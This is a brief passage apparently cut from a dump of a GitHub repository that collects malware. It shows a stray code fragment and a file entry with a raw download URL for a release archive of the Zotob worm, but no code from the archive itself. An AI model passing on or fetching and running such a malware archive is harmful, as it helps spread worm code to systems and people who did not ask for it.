ExitThread] 326 | -------------------------------------------------------------------------------- /zotob/Zotob Code/RELEASE/zotob.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/zotob/Zotob Code/RELEASE/zotob.zip --------------------------------------------------------------------------------